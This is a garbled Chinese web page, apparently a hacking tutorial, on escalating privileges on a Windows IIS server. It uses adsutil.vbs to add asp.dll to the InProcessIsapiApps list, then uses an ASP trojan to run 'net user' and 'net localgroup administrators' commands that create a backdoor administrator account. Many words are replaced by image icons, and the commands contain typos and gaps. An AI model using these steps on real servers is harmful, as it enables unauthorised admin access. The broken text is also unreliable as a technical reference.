![](/icons/15445de.gif)
![](/icons/15445System.gif)
这个ISAPI
![](/icons/15445chengxu.gif)
首先我看看iis
![](/icons/15445de.gif)
![](/icons/15445dou2.gif)
![](/icons/15445de.gif)
adsutil.vbs get /W3SVC/InProcessIsapiApps
先用下面命令取得当前
![](/icons/15445de.gif)
c:\winnt\sytem32\inetsrv>cscript.exe adsutil.vbs get /W3SVC/InProcessIsapiApps
inprocessisapiapps :(LIST) (5 Items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
---没有asp
然后把asp.dll加进/LM/W3SVCInProcessIsapiApps里面
c:\winnt\sytem32\inetsrv>adsutil.vbs
![](/icons/15445set.gif)
"c:\winnt\system32\inetsrv\asp.asp"
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\nswprt.dll"
现在看看asp木马
![](/icons/15445de.gif)
我们加
![](/icons/15445yi.gif)
net user xjf ***** /add
net lcoalgroup administrators xjf /add----哈哈...成功了.
不过需要注意
![](/icons/15445dou.gif)
![](/icons/15445dou.gif)
![](/icons/15445dou.gif)
![](/icons/15445de.gif)
![](/icons/15445yi.gif)
![](/icons/15445de.gif)
![](/icons/15445de.gif)
![](/icons/15445dou2.gif)
![](/icons/15445dou2.gif)
![](/icons/15445yi.gif)
![](/icons/15445chengxu.gif)
![](/icons/15445yi.gif)
最新评论